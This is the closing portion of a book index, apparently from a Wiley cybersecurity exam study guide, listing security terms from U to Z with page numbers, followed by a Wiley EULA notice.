unmanned aerial vehicles (UAVs), 76, 233

urgency, 24, 200

U.S. Department of Agriculture (USDA), 150, 278

USB data blockers, 73, 231

user accounts, 258

user behavior analysis, 187

V

vendor diversity, 46, 213, 237–238

vendor support, 7, 9, 189, 191

version numbering, 67, 227

vertical movement, 15, 194

-v flag, 280

Virtual Desktop Infrastructure (VDI), 94, 222, 245

virtual firewall, 103, 251, 261

virtual IP (VIP), 247

virtual LAN (VLAN), 90, 242–243, 260

virtual machine (VM)

escape attacks, 57, 58, 66, 220, 226

forensics, 278

sprawl, 57, 66, 220, 226

virtual private clouds (VPCs), 217, 261

virtual private network (VPN), 86, 90, 95, 240, 242, 245, 250

virtualization, 220

virus, 28, 202

vishing, 28, 53, 202, 217, 239

Visual Basic for Application (VBA) script, 195

Voice over Internet Protocol (VoIP), 77, 234

Volatility framework, 279

vulnerability assessment, 30, 162, 204, 283

vulnerability scans, 5, 25, 43, 188, 200, 211, 212

W

war dialing, 28, 86, 202, 207, 239

war driving, 16, 195

war flying, 16, 33, 195, 206

war walking, 195, 207

warm site, 50, 68, 215, 228

watering hole attacks, 18, 29, 33, 37, 196, 203, 206, 209

wearables, 228

web application firewall (WAF), 52, 103, 154, 186, 211, 216, 251, 281

web page titles, 270

web proxy, 250, 252

whaling, 9, 22, 37, 191, 199, 209

white teams, 4–5, 22, 30, 35, 188, 199, 204, 207

white-box test, 190, 200, 201, 203, 204

whitelisting, 91, 243

Wi-Fi hotspots, 190

Wi-Fi networks, 252

Wi-Fi Protected Setup (WPS), 2, 88, 186, 192, 241

wildcard certificate, 87, 240

Windows Defender Firewall, 148, 277

WinHex, 274

wireless access point (WAP), 2, 3, 186

wireless network heat maps, 91–92, 243

wireless routers, 204

Wireshark, 136, 137, 138, 152, 270, 271, 278, 279

worms, 13, 23, 28, 29, 193, 199, 202, 203

WPA, 92, 113, 120, 124, 243, 258, 262, 265

X

XaaS, 68, 228

XML injection, 209

Z

zero-day disclosure, 35, 207

zero-day exploits, 20, 191, 197

zero-knowledge test, 190

zero-trust environment, 260

zero-wiping, 271

Zigbee, 61, 223

WILEY END USER LICENSE AGREEMENT. Go to www.wiley.com/go/eula to access Wiley's ebook EULA.